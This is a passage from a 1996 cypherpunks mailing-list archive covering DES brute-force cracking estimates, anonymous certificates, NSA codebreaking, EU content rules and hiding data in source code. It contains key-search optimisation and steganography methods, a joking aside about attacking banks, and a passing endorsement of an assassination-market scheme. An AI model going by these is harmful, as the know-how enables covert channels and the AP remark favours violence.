viable theories of recovery, but neither seems especially promising.

Matt Ghio wrote and asked if a direct infringement must exist before a
third party can be held liable for infringement. Nimmer (a relatively
authoritative treatise on copyright) argues that it should not be possible
to have third party liability without a direct infringement, with a
reference to cases I haven't had time to look at yet. (at 12.04[A][3][a],
if anyone's fortunate enough to have a copy of Nimmer at hand) 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 17 Oct 1996 14:25:12 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: YES OR NO?
In-Reply-To: <B5JyVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961017141221.18637E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> I said: YES, when I have the time.

Great.  So let's pick a date sufficiently in the future that you
can make a firm commitment.  For starters, our three winter 
meetings are tentatively scheduled for December 14, January 11 
and February 8.  Any of those sound good to you?  Winter is a 
great time to escape from New York and come to sunny California.  
Hell, pay for your wife's (or boyfriend's) plane fare, and we'll 
pay for a double room at the hotel.

What do you say now?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 13:32:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: YES OR NO?
In-Reply-To: <Pine.SUN.3.91.961017083800.26656A-100000@crl.crl.com>
Message-ID: <B5JyVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > It is a great honor to meet a net.legent in person.
> 
> I hope Dimitri will stop hidding behind his computer and "honor" 
> us with his presence at an SF Bay area Cypherpunks meeting.  I've 
> got pledges for nearly $1200 to bring him out here to speak.  All
> we need now is a serious response from Dimitri.  I guess when the
> going gets tough, the "net legends" get yellow.  What are you 
> afraid of Dimitri?

I said: YES, when I have the time.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Thu, 17 Oct 1996 15:35:09 -0700 (PDT)
To: hal@rain.org
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
Message-ID: <199610172233.PAA01850@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: Carl Ellison <cme@acm.org>
> >> >Steve Shear <azur@netcom.com> writes:
> >
> >[much cut]
> >>
> >> I've been charged with developing an Internet service which needs to assure
> >> its clients of anonymity.  However, we fear some clients may abuse the
> >> service and we wish to prevent the abusers from re-enrollment if
> >> terminated for misbehavior. (In your example, it would be the person(s)
> >> trying to discover the service host via flood).
> >>
> >> My thought was to base enrollment on some sort of 'blinding' of their
> >> certified signature (e.g., from Verisign) which produces a unique result
> >> for each signature but prevents the service from reconstructing the
> >> signature itself (and thereby reveal the client's identity).  I'm calling
> >> this negative authentication.
>
> The mistake is to think of using ID certificates (like those from Verisign)
> in the first place.  They don't mean anything.
>
> You want an authorization certificate, such as produced by SPKI.  You need
> to know what a key is authorized to do, not what name is associated with
> the key.

(Sorry about quoting so much, but I liked Steve Shear's succinct problem
statement.)

I don't see how authorization certificates solve this problem.  How
would you determine if someone was qualified to receive an authorization
certificate?  And what would you do to make them stop using the service
if they abuse it, and to stop them from getting new authorization
certificates?

Thanks,
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 13:33:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [Noise] Re: [POINTERS] On Vulis' net background
In-Reply-To: <Pine.BSF.3.91.961017113357.1753A-100000@mcfeely.bsfs.org>
Message-ID: <R8JyVD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

> On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > Rabid Wombat <wombat@mcfeely.bsfs.org> writes:
> > > I don't know if anyone ever figured out who was forging votes for whom -
> > > the May '96 KOTM award was hotly contested, with forgeries flying every
> > > which way. If you have way too much time on your hands, read all about it
> > > at: http://www.wetware.com/mlegare/kotm/winnersk96.html#may96
> > 
> > Supposedly I won by a 30-vote margin over David C Lawrence (the moderator
> > of news.announce.newgroups), which I'm very proud of. Do take a look at
> > this site and at Misha Verbitsky's archives (taking everything with a
> > grain of salt). It makes good reading.
> 
> Ah, but did you forge votes FOR yourself??

Good question.  That's what Legare seems to claim in his web page.
Of course we KNOW that all 600 congressmen and senators REALLY
voted from their addresses at bwalk.dm.com...

I was cc:'d about 400 votes for David C Lawrence - should I send
them to this mailing list?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 17 Oct 1996 15:04:39 -0700 (PDT)
To: scrappo.reverb@juno.com>
Subject: Re: rival Clipper products
In-Reply-To: <19961016.162913.7943.0.scrappo.reverb@juno.com>
Message-ID: <Pine.LNX.3.95.961017154957.675A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 16 Oct 1996, Psuedo Nym wrote:

> What somebody needs to do is make a rival for
> Clipper products. I propose that somebody with
> enough money should have a Clipper-type chip
> implementing Triple-DES or whatever developed
> and marketed. They should do the same things,
> except not be restricted by the government
> (obviously this wouldn't be for export) by the means
> of using weak crypto. These devices could probably
> be marketed to the same audience that Clipper
> products are aimed at, i.e. the general unsuspecting
> populace. The only problem I could see would be
> educating whoever buys into how the government
> is pulling the wool over their eyes. I'm sure with
> some funding from a major source, or some
> donation of time/supplies from a manufacturing
> company, it could be pulled off in grand fashion.
> Who said we can't play the government's little game?

Clipper is dead.  It makes no sense for anyone to pay >$70 for a hardware
encryption device when many tools are available on the 'net for free.  AT&T
is manufacturing a clipper phone and there aren't any software products that I
know of that support Fortezza(?) cards.  The much larger danger is the recent
"key recovery" initiative.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMmaPHyzIPc7jvyFpAQFJugf/c5fLnzoXkfZl5ChWZDRlJwMrozj9GBii
e8tzkS+lp8dnlUoN78mE+gcxZ4+NYBsYKHvYN51wZ8K69Fkh9KrVKcgv06rXBHmk
cTwvA0QwoJh051V/jo6BONqHdBEyK76kOyIzU9R0Z3GRlkk08wbXm1oYu3NOWUdR
sHvwZjAg23oI07DlPIOUuvadCLiOrCV4gjgzxeUCmK04G0ey+/JeCC3mQA5s/KQA
Uy8k7VNCXgLOMe7ZPLgoNnqOIMb3rEODKtvcIqmp+AX8Dfi7llayG5q+2bwlmSdF
MkgroQV1ce0ernBvpCoki0+3pVvGyWagNiIby42oW2VmQL458z+TRA==
=a7G1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 17 Oct 1996 17:36:49 -0700 (PDT)
To: sameer@c2.org
Subject: Re: DES cracker.
In-Reply-To: <199610162058.NAA06263@clotho.c2.org>
Message-ID: <199610171530.QAA00463@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



[added cc cypherpunks also]

Sameer Parekh <sameer@c2.org> writes:
> Peter Trei <trei@process.com> writes:
> > 	Ideally, this should be a DEMO case of a real world encrypted
> > application, in which we have a cryptotext, and a known plaintext,
> > each at least one 8-byte block long.
> 
> 	I'd like to get in touch with a bank who can provide us some
> sample ciphertext for an ATM transaction or something like that. I
> initially thought we should hit SWIFT, but that would be very
> illegal. =)

If someone can dig up a selection of banking protocols (some of these
things must be standardised), perhaps we can simulate the same thing
without the legal implications.

Of course you'd need the person constructing the challenge to be
trustworthy to the tune of $10k, or whatever the prize fund pans out
to be.  For that matter the NSA, or anyone else with a hardware
breaker would be able to cheat, but then they help our cause, which is
to demonstrate how weak DES is :-)

So start digging for banking protocols!  Personal contacts, web
searches, obtaining standard documents, dumpster diving, whatever it
takes.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 17 Oct 1996 17:38:31 -0700 (PDT)
To: mikej2@Exabyte.COM
Subject: Re: DES cracker.
In-Reply-To: <Pine.SUN.3.95.961017093643.16725B-100000@gedora>
Message-ID: <199610171533.QAA00477@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



[cc'd to cypherpunks]

Michael Johnson <mikej2@Exabyte.COM> writes:
> On Thu, 17 Oct 1996, Ted DiSilvestre wrote:
> >... 
> > As someone posted a few weeks ago, rather than find one message to crack we
> > should work on ten or a hundred simultaneously if possible. This seems to
> > be the easiest way (assuming we can find this many "good" messages) to
> > increase cracking efficiency by orders of magnitude.
> 
> Hmmm... I don't see that this increases cracking efficiency. The suprising
> (to me) result is that it doesn't really hurt it any. The increase in
> average expected time to find a particular key is offset by the fact that
> more keys are tried at once. We could crack just as many keys per year, on
> average, but we become less sure of which keys will be cracked first.

You do save something: you only need one key schedule per key that you
try.  You can try the key against multiple ciphertexts.

A negative effect is that you might loose cacheing opportunities as
code and data are increased.

For timings you're likely to get for DES, you suffer from the law of
diminishing returns quickly, and the additional keys/sec from doing
more keys tapers off asymptotically.

The number of keys it would be most efficient to use (say where adding
another key speeds things up by less than 1%, or whatever) hinges
heavily on the actual balance between how fast the key schedule can be
made to go as compared to a CBC block operation (or whatever mode
you're attacking).  Also the protocol you are attacking, and the
position of the known plaintext in this block affects things greatly,
the further along the plaintext, the more blocks you have to cycle
through, and more data you have to move around.

To illustrate the effect, here's some quick cacluations based (loosly)
on the timings being quoted.

With Peter Trei's projected DES block timing from pentium 90 to
pentium 133, and approximate equivalence of ecb and cbc demonstrated
by Eric's code (this set of figures is hand-waving: I'm not at all
sure like is being compared with like, and we are now extrapolating
from extrapolations), combining with Eric's keyschedule timing:

keyschedule 12.2us (Eric Young's) 
DES cbc block = 0.47us (from Peter Trei's extrapolated pentium 133Mhz)

n keys    |  key   |   DES  | elapsed for | elapsed per |
at a time |  sched |   cbc  | n key tests | key test    | keys/sec
-----------------------------------------------------------------------
     1      12.2us     1.4us      13.6us         13.6us    73.5k keys/s
     2      12.2us     2.8us      15.0us          7.5us   133.2k keys/s
     4      12.2us     5.6us      17.8us          4.5us   224.2k keys/s
     8      12.2us    11.3us      23.5us          2.9us   340.7k keys/s
    16      12.2us    22.6us      34.8us          2.2us   460.3k keys/s
    32      12.2us    45.1us      57.3us          1.8us   558.3k keys/s
    64      12.2us    90.2us     102.4us          1.6us   624.8k keys/s
   128      12.2us   180.5us     192.7us          1.5us   664.3k keys/s
   256      12.2us   361.0us     373.2us          1.5us   686.0k keys/s

So 256 keys gives ~9x improvement in keys/sec with these even less
accurate guestimates, and using more keys won't increase that
improvement all that much, asymptotically tailing off around 9.5x for
reasonable numbers (< 64k keys).

Improving the key schedule in the second table doesn't add hardly
anything, because it is basically irrelevant when you get to 256 keys.
(However, a faster key schedule _is_ significant for 1 key at a time).

I think that Peter Trei / Phil Karn are fairly close to the limit, and
if anything the resulting figure will be a fair bit short of what I
have extrapolated because I suspect their peak Mb/s figure will go
down when you start doing practical things with the addition of extra
data shifting, etc.

So it all depends on what corners can be cut in the key schedule, and
how much you gain by coding the keyschedule in hand optimised
assembler, and all the other factors discussed above, in summary:

- keyschedule / CBC block timings ratio
- how far into the message is the known plaintext (how many blocks to cycle)
- cache limits (additional restriction on optimal number of keys) 
- extra code overhead over peak cache Mb/s (moving data, extra code)
- extra code size and complexity (for multiple key code)

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Oct 1996 13:56:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EC patent
Message-ID: <v03007828ae8c4d3adfed@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 17 Oct 1996 14:03:34 +0800
From: James Lee <jlee@ccl.itri.org.tw>
Reply-To: jlee@ccl.itri.org.tw
Organization: Internet Tech Div, Computer & Communication Lab, Indudtrial
Technology Research Institute
Mime-Version: 1.0
To: set-discuss@commerce.net
Subject: EC patent
Sender: owner-set-talk@commerce.NET
Precedence: bulk

+----------------------------------------------------+
Addressed to: set-discuss@commerce.net
+----------------------------------------------------+

I heard that CitiBank has filed for a patent in Japan with 140+ claims
covering many aspects of electronic commerce, security electronic
transaction, etc. Does anyone know more about it? What impact will it
bring to all SET members?


James Lee
Director, Internet Technology Division
Computer & Communication Laboratories
Industrial Technology Research Institute
W000/CCL, 195 Chunghsin Rd., Sec. 4, Chutung, TAIWAN
886-3-591-4533(W) 886-3-582-0085(Fax) jlee@ccl.itri.org.tw
------------------------------------------------------------------------
This message was sent by set-discuss@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Fri, 18 Oct 1996 14:12:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Brock Meeks on NSA domestic codebreaking, from Muckraker
Message-ID: <v01510101ae8c60523b1c@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


This is Brock's unedited Muckraker that's up at HotWired today
(http://www.muckraker.com). Forwarded with permission. --Declan

**********

Crypto Mission Creep
By Brock N. Meeks (brock@well.com)

The Justice Department has, for the first time, publicly acknowledged
using the code-breaking technologies of the National Security Agency, to
help with domestic cases, a situation that strains legal boundaries of
the agency.

Deputy Attorney General Jamie Gorelick admitted in July, during an open
hearing of the Senate's Governmental Affairs permanent subcommittee on
investigations, that the Justice Department:  "Where, for example, we
are having trouble decrypting information in a computer, and the
expertise lies at the NSA, we have asked for technical assistance under
our control."

That revelation should have been a bombshell.  But like an Olympic
diver, the revelation made hardly a ripple.

By law the NSA is allowed to spy on foreign communications without
warrant or congressional oversight.  Indeed, it is one of the most
secretive agencies of the U.S. government, whose existence wasn't even
publicly acknowledged until the mid-1960s.   However, it is forbidden to
get involved in domestic affairs.

During the hearing Sen. Sam Nunn (D-Ga.) asked Gorelick if the President
had the "the constitutional authority to override statutes where the
basic security of the country is at stake?"  He then laid out a
scenario:  "Let's say a whole part of the country is, in effect,
freezing to death in the middle of the winter [because a power grid has
been destroyed] and you believe it's domestic source, but you can't
trace it, because the FBI doesn't have the capability.  What do you do?"

Gorelick replied that:  "Well, one thing you could do -- let me say
this, one thing you could do is you could detail resources from the
intelligence community to the law enforcement community.  That is, if
it's under -- if it's -- if you're talking about a technological
capability, we have done that."   And then she mentioned that the NSA
had been called on to help crack some encrypted data.

But no one caught the significance of Gorelick's' statements.  Instead,
the press focused on another proposal she outlined, the creation of what
amounts to a "Manhattan Project" to help thwart the threat of
information warfare.  "What we need, then, is the equivalent of the
'Manhattan Project' for infrastructure protection, a cooperative venture
between the government and private sector to put our best minds together
to come up with workable solutions to one of our most difficult
challenges,'' Gorelick told Congress.  Just a day earlier, President
Clinton had signed an executive order creating a blue-ribbon panel, made
up of several agencies, including the Justice Department, the CIA, the
Pentagon and the NSA and representatives of the private sector.

Though the press missed the news that day; the intelligence agency
shivered.  When I began investigating Gorelick's statement, all I got
were muffled grumbling.   I called an NSA official at home for comments.
"Oh shit," he said, and then silence.   "Can you elaborate a bit on that
statement?" I asked, trying to stifle a chuckle.  "I think my comment
says it all," he said and abruptly hung up the phone.

Plumbing several sources within the FBI drew little more insight.   One
source did acknowledge that the Bureau had used the NSA to crack some
encrypted data "in a handful of instances," but he declined to
elaborate.

Was the Justice Department acting illegally by pulling the NSA into
domestic work?   Gorelick was asked by Sen. Nunn if the FBI had the
legal authority to call on the NSA to do code-breaking work.   "We have
authority right now to ask for assistance where we think that there
might be a threat to the national security," she replied.  But her
answer was "soft."   She continued:  "If we know for certain that there
is a -- that this is a non-national security criminal threat, the
authority is much more questionable."  Questionable, yes, but averted?
No.

If Gorelick's answers seem coy, maybe it's because her public statements
are at odds with one another.   A month or so before her congressional
bombshell, she revealed the plans for the information age"Manhattan
Project" in a speech.   In a story for Upside magazine
<http://www.upside.com/online/columns/cybersense/9607.html#one>, by
old-line investigative reporter Lew Koch, where he broke the story,
Gorelick whines in her speech about law enforcement going through "all
that effort" to obtain warrants to search for evidence only to find a
child pornography had computer files "encrypted with DES" that don't
have a key held in escrow.  "Dead end for us," Gorelick says.  "Is this
really the type of constraint we want? Unfortunately, this is not an
imaginary scenario. The problem is real."

All the while, Gorelick knew, as she would later admit to Congress, that
the FBI had, in fact, called the NSA to help break codes.

An intelligence industry insider said the NSA involvement is legal.
"What makes it legal probably is that when [the NSA] does that work
they're really subject to all the constraints that law enforcement is
subject to."    This source went on to explain that if the FBI used any
evidence obtained from the NSA's code-breaking work to make it's case in
court, the defense attorney could, under oath, ask the NSA to "explain
fully" how it managed to crack the codes.  "If I were advising NSA today
I would say, there is a substantial risk that [a defense attorney] is
going to make [the NSA] describe their methods," he said.  "Which means
it's very difficult for the NSA to do its best stuff in criminal cases
because of that risk."

Some 20 years ago, Sen. Frank Church, then chairman of the Senate
Intelligence Committee, warned of getting the NSA involved in domestic
affairs, after investigating the agency for illegal acts.  He said the
"potential to violate the privacy of Americans is unmatched by any other
intelligence agency."   If the resources of the NSA were ever used
domestically, "no American would have any privacy left . . . There would
be no place to hide," he said.  "We must see to it that this agency and
all agencies that possess this technology operate within the law and
under proper supervision, so that we never cross over that abyss.  That
is an abyss from which there is no return," he said.

And yet, the Clinton Administration has already laid the groundwork for
such "mission creep" to take place, with the forming of this "Manhattan
Project."

But if the Justice Department can tap the NSA at will -- a position of
questionable legality that hasn't been fully aired in public debate --
why play such hardball on the key escrow encryption issue?

Simple answer:  Key escrow is an easier route.  As my intelligence
community source pointed out, bringing the NSA into the mix causes
problems when a case goes to court.   Better to have them work in the
background, unseen and without oversight, the Administration feels. With
key escrow in place, there are few legal issues to hurdle.

In the meantime, the Justice Department has started the NSA down the
road to crypto mission creep.  It could be a road of no return.

Meeks out...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Thu, 17 Oct 1996 15:40:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: European Commission on "Illegal and harmful content on the Internet"
Message-ID: <0NrZy4B4GDiQ089yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

A recently released European Commission Communication on "Illegal
and harmful content on the Internet" may prefigure the nature of
coming European Union regulatory initiatives concerning the net.
This Communication was in response to a 27 September resolution
by the Telecommunication Council on "preventing the dissemination
of illegal content on the Internet, in particular child
pornography." The document reportedly reflects what will be
ongoing work to "present practical measures in time for the next
Telecommunications Council on 28 November 1996."

The Communication describes its aims as:

firstly to describe briefly the different types of illegal and
harmful content,

secondly to examine the technical context in which action can be
taken to deal with illegal and harmful content,

and finally to suggest a number of practical measures designed to
be rapidly implemented

Among the points of interest, it states with emphasis that
"additional international cooperation is required to avoid 'safe
havens' for documents contrary to general rules of criminal law."
With respect to anonymous communications it discusses proposed
"measures to close known loopholes and improve traceability and
that anonymous remailers record details of identity."

As is typical of these agendas, the devil will be in the evolving
details of enforcement. It looks like 1997 will be a busy year
for proponents of greater state control over internet content
both here and abroad. If they can conjure up enough sufficiently
compelling bogeymen, it could be a very successful one for them
as well.

The HTML version of this document can be found at:

<http://www2.echo.lu/legal/en/internet/content/communic.html>

Links to RTF and Word versions along with the accompanying press
release and related documents can be found at:

<http://www2.echo.lu/legal/internet/html>

- -Michael



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850

iQCVAwUBMmaw0tGJlWF+GPx9AQGMLgP+JC5Lyd0NZDukq8AWipUNcDUgb6m16iUN
3smYcPdPYvsUDSWznx7ZQsklQV0oz9u5Ru7s8VoOQfA2wqSoiai3LiUiJg5WkfOg
HTAbvVQCeoUaRmkmmbFJSzfqVzGB4VkJRCE4htPmmqYhCwwmMjooTi3bAClySGTD
7YcLjv0pC5w=
=4EZY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 17 Oct 1996 17:39:45 -0700 (PDT)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: EC patent
Message-ID: <199610180039.RAA01438@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:53 PM 10/17/96 -0400, Robert Hettinga wrote:
>--- begin forwarded text
>Date: Thu, 17 Oct 1996 14:03:34 +0800
>From: James Lee <jlee@ccl.itri.org.tw>
>Reply-To: jlee@ccl.itri.org.tw
>+----------------------------------------------------+
>Addressed to: set-discuss@commerce.net
>+----------------------------------------------------+
>
>I heard that CitiBank has filed for a patent in Japan with 140+ claims
>covering many aspects of electronic commerce, security electronic
>transaction, etc. Does anyone know more about it? What impact will it
>bring to all SET members?
>James Lee
>--- end forwarded text

Maybe Japanese law is different, but don't I recall reading somewhere that 
"methods of doing business," business practices in general, are not 
patentable? 

Not that it would surprise me if the Patent Office idiots were to change 
their minds, like they did concerning software, algorithms, and mathematics 
in general...


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Oct 1996 14:54:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EUP_hem
Message-ID: <1.5.4.32.19961017215404.00664b1c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-17-96. WaPo:

   "U.S. Considers Slugging It Out With International
   Terrorism"

      Officials contend that the main threat now comes from a
      murky network of home-grown, privately financed and
      largely independent groups forming a kind of
      international "terrorists' Internet." That network is
      proving extremely difficult for U.S. intelligence
      agencies to locate and penetrate. "Today's terrorists
      don't have to depend that much any more on states for
      access to financing or the technological means."

   "Postal Service Plans to Leave Its Mark on Electronic Mail"

      Cylink is developing a system for electronically
      postmarking and encrypting computer messages and Sun and
      Enterprise Productivity are developing software that
      will allow bulk mailers to calculate the price of mail
      shipments on the Internet. The Postal Service predicted
      that the new system ultimately will account for $5
      billion in postage a year, about 9 percent of all
      postage.

   -----

   http://jya.com/euphem.txt  (18 kb for 2)

   ftp://jya.com/pub/incoming/euphem.txt

   EUP_hem








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 17 Oct 1996 18:39:13 -0700 (PDT)
To: Hal Finney <hal@rain.org>
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
Message-ID: <v02130503ae8c25d431bc@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain



>> >> >Steve Schear <azur@netcom.com> writes:
>> >
>> >[much cut]
>> >>
>> >> I've been charged with developing an Internet service which needs to
>>assure
>> >> its clients of anonymity.  However, we fear some clients may abuse the
>> >> service and we wish to prevent the abusers from re-enrollment if
>> >> terminated for misbehavior. (In your example, it would be the person(s)
>> >> trying to discover the service host via flood).
>> >>
>> >> My thought was to base enrollment on some sort of 'blinding' of their
>> >> certified signature (e.g., from Verisign) which produces a unique result
>> >> for each signature but prevents the service from reconstructing the
>> >> signature itself (and thereby reveal the client's identity).  I'm calling
>> >> this negative authentication.
>>
>
>(Sorry about quoting so much, but I liked Steve Schear's succinct problem
>statement.)
>
>I don't see how authorization certificates solve this problem.  How
>would you determine if someone was qualified to receive an authorization
>certificate?  And what would you do to make them stop using the service
>if they abuse it, and to stop them from getting new authorization
>certificates?
>
>Thanks,
>Hal

It seems that one crux of the problem revolves around the CA and its method
of certificate issuance.  A CA which uses biometric data to
reduce/eliminate the chance that an applicant could get several, unrelated,
certificates issued would provide a basis for negative authentication
(similar to a negative credit file).

A one-way function performed, by the client, on their certificate from this
CA would yield a token which unambiguously binds it to a valid certificate
of the CA (and therefore uniquely identifies them) w/o revealing the
certificate itself.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 17 Oct 1996 18:39:19 -0700 (PDT)
To: wfgodot@iquest.com (Michael Pierson)
Subject: Re: European Commission on "Illegal and harmful content on the Internet"
Message-ID: <v02130504ae8c29f52a1e@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>A recently released European Commission Communication on "Illegal
>and harmful content on the Internet" may prefigure the nature of
>coming European Union regulatory initiatives concerning the net.
>This Communication was in response to a 27 September resolution
>by the Telecommunication Council on "preventing the dissemination
>of illegal content on the Internet, in particular child
>pornography." The document reportedly reflects what will be
>ongoing work to "present practical measures in time for the next
>Telecommunications Council on 28 November 1996."
>
>The Communication describes its aims as:
>
>firstly to describe briefly the different types of illegal and
>harmful content,
>
>secondly to examine the technical context in which action can be
>taken to deal with illegal and harmful content,
>
>and finally to suggest a number of practical measures designed to
>be rapidly implemented
>
>Among the points of interest, it states with emphasis that
>"additional international cooperation is required to avoid 'safe
>havens' for documents contrary to general rules of criminal law."
>With respect to anonymous communications it discusses proposed
>"measures to close known loopholes and improve traceability and
>that anonymous remailers record details of identity."
>
>As is typical of these agendas, the devil will be in the evolving
>details of enforcement. It looks like 1997 will be a busy year
>for proponents of greater state control over internet content
>both here and abroad. If they can conjure up enough sufficiently
>compelling bogeymen, it could be a very successful one for them
>as well.
>

It looks as if a functioning AP system can't be here any too soon.  I can't
wait to bet that these sorts of thought-crime restriction won't be seen as
reasonable.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Thu, 17 Oct 1996 10:56:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A home for stego in source code ?
Message-ID: <9610171756.AA00490@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




The monarchist lightning-hater has been cracking the whip again.
> Where is highly sophisticated stego?

Adam Back suggested several areas for investigation, including English text.

Some weeks ago somebody suggested using synonyms in natural language
to express stegodata.  A synonym for a word in the message would be
chosen from a defined set, and the choice that was made would express
a bit or several.  This seems related to the clever "alternate
dictionary" idea in RFC-1938.  But a lack of true synonyms (or
programs that understand natural language) make it look pretty
hopeless as a practical proposition.

SOURCE CODE A POSSIBLE CHANNEL

Even small programs often have several hundred symbols.  The names
given to these are mostly arbitrary, and they can be replaced
(consistently) by other names by a program.  In fact there "shrouded"
source code is sometimes released to make it less clear to the human
reader than the original source.

In this application the names would be chosen randomly from a set of
words and syllables (perhaps with some rules about which are
plausible together).  There is also a choice of StyleWithCaps and
style_with_underscores.

If the symbols (in order of first appearance) all have a CRC
calculated on them I'd guess you could get 4 bits each without
difficulty.

There are also comments.  These might be natural language, debugging
code and never-really-got-this-working code.  Maybe a CRC on each
comment is worth 8 bits.   Comments of the form

   /* Thanks to P.McNicholas, M.Davies and WorpleSword
      for advising on the next section **/

could be added with random names quite well (although the user might
have to mark the complicated code fragments suitable for receiving
such attributions).  Names used could be lifted from a list of
known helpful programmers ...

And then there is layout.  The kind of thing that is standardised with indent(1).
This would be anti-standard in layout, choosing spacing and linebreaks and
spaces with the stegomessage in mind.

And some code constructions are capable of rewriting to add info to the message.

0==x , x==0
x>y  , x<y
i++  , ++i   (sometimes)
for  , while
if   , switch (sometimes)

Or variables could be added to hold intermediate values, and lengthen
the source as our desired effect.

There may be more scope for plausible stego in code that doesn't have
to work.  Next time you see a load of verbose mistyped rubbish called
"Help me with my program!!!" it could be someone who got this idea
ahead of me.

I've been dipping into "Understanding and Writing Compilers"
(Bornat, 1979).  (free, withdrawn from library)
